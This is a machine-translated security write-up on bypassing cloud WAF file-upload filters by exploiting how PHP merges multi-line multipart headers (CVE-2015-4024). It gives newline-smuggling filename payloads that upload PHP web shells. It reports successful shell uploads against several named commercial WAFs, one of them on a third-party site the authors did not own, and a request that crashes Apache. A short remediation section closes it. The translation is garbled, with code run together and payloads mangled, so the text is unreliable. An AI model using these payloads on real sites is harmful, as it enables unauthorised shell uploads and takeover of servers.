0x00 Background Introduction
Today we want to start with a PHP remote DOS vulnerability in 2015.04.03 (cve-2015-4024). Technical details see the following link, Chinese version: http://drops.wooyun.org/papers/6077, English version: https://bugs.php.net/bug.php?id=69364. Because PHP parses the header of the body part for string stitching, and the stitching process repeats the copy character resulting in DOS. In fact, the vulnerability has other non-DOS utilization value, one of which is to bypass the current various cloud WAF file upload defense strategy.
At present, domestic and foreign popular cloud WAF manufacturers like Baidu Cloud acceleration, 360 website defender, accelerating music, solutions and so on. Because of the PHP remote DOS vulnerability and the features of the official PHP repair program, we successfully exploited this vulnerability to bypass the current mainstream WAF file upload defenses, such as Baidu Cloud acceleration, 360 site Defenders, know-how to accelerate music, security dog.
Next, let's take PHP as an example to parse our bypass method in detail.
How 0x01 bypasses the WAF
According to the PHP dos vulnerability principle, when the Multipart_buffer_headers function parses the header corresponding to value, the value has n rows. Each line of string starts with a white space or does not have the character ': ', triggering the following code block that merges the value. The value of the parse header then executes (n-1) The block of code that merges value, resulting in DOS.
#!phpprev_len= strlen (prev_entry.value); cur_len= strlen (line); Entry.value= Emalloc (Prev_len + Cur_len + 1); 1 Shard Memory memcpy (Entry.value,prev_entry.value, Prev_len);//1 copies memcpy (entry.value+ Prev_len, line, Cur_len ); 1 copies entry.value[cur_len+ Prev_len] = ' + '; entry.key= estrdup (prev_entry.key); Zend_llist_remove_tail (header);//1 Memory release
While the official PHP fix, when merging, avoid duplicate copies, so as to avoid DOS. The key to bypassing the WAF is that when the PHP multipart_buffer_headers function parses the header for value, there are multiple rows of value values. The string for each line starts with a white space or does not have the character ': ' and is merged. WAF does not consider protocol compatibility when parsing file name uploads, and it can be bypassed without a multi-line merge.
According to the principle of construction bypass WAF file upload Defense Payload,waf resolution to the file named "Test3.jpg", and php resolves to the file name is "test3.jpg\nf/shell.php", because "/" is the directory delimiter, The uploaded file name becomes shell.php. The following are file uploads that bypass paylaod, test scripts, and Paylaod.
WAF bypasses payload:
#!php------Webkitformboundaryx7v4ahipwn8ig52ycontent-disposition:form-data; Name= "File"; Filename= "Test3.jpg\nsf/shell.phpcontent-type:application/octet-stream
------ webkitformboundaryx7v4ahipwn8ig52y
File Upload function test feet:
#!php
Payload can upload normally
0x02 Bypass WAF Combat
The author through the establishment of their own test station, access to 360 website defender and accelerated music, to verify the way to bypass WAF file upload defense.
2.1 Bypass 360 website defender
Step 1, verify that the website has been defended by the 360 website defender, intercepting requests to upload PHP files directly.
Step 2: Successfully bypass the 360 website defender, upload the shell successfully, the file is apo.php. In this request, there is no content-type that does not affect the bypass.
2.2 Bypass know Chong Woo accelerated music
Step one: Verify that the website is accelerated for music protection, blocking requests to upload PHP files directly.
Step Two:
Successfully bypass acceleration music, upload shell, file is syt.php.
2.3 Bypass Baidu Cloud acceleration
Baidu Cloud acceleration and CloudFlare, from Baidu to speed up the interception page can see the use of CloudFlare. But the estimated localization, Baidu cloud acceleration should be Baidu and CloudFlare common product bar. Testing Baidu did not set up its own test environment, found an access to the Baidu Cloud acceleration station to test.
Step one: Verify that the website was accelerated by Baidu Cloud protection, blocking the direct upload of PHP files request.
Step two: Successfully bypassing cloud acceleration
2.4 Safety Dog Test
Use this method to test the security dog file upload,
#!bashcontent-disposition:form-data; Name= "File"; Filename= "2.phpaa:content-type:image/jpeg
PHP and AA This is%0a, processing the request of the Apache process directly crashes. Feeling can overflow, without depth.
Test of 2.5 CloudFlare
In order to test whether to bypass the foreign version of the CloudFlare, specifically bought its services. As a result, in the case of full rule, the file upload is not blocked.
2.6 Amazon WAF
Amazon's WAF has no rules, and all rules require user configuration. In the configuration options, there is no file upload option, so there is no way to bypass the argument. The difference between the domestic WAF and the foreign WAF is quite large, so why design is worth pondering.
We've also bypassed other WAF, not listed here.
0x03 extension-more work
3.1 Parsing filename bypass for other characters
Similarly, we found that in addition to double quotes, using single quotation marks bypasses the defenses of WAF and implements file uploads.
#!php------Webkitformboundaryx7v4ahipwn8ig52ycontent-disposition:form-data; Name= "File"; Filename= ' Test3.jpg\nsf/shell.phpcontent-type:application/octet-stream
------ webkitformboundaryx7v4ahipwn8ig52y
3.2 Analyzing other application scripting languages
We also found that JSP parsing has its own characteristics and can be used to bypass the WAF. For the time being, the commonly used Web application scripting languages such as Asp,aspx,python are not tested.
0x04 Repair Solution
4.1 Restoration Plan One
When parsing a file upload request, the request is denied if the discovery request does not conform to the protocol specification. A false intercept may occur and the extent of the impact of a false intercept needs to be assessed.
4.2 Repair Scenario II
PHP-compatible file parsing, when parsing a file name, begins with a single or double quotation mark, and the corresponding single or double quotation marks are closed.
0X05 Summary
This article has successfully uploaded the shell by review PHP remote DOS Vulnerability (CVE-2015-4024) and using this feature to bypass file upload defenses for existing WAF. More important value provides us with a new way of thinking around the WAF, a new direction: using the back-end application scripts and WAF behavior differences to circumvent the WAF defenses. In general, a good WAF should be able to handle the differences between compatible Web application containers, standard protocols, and Web servers.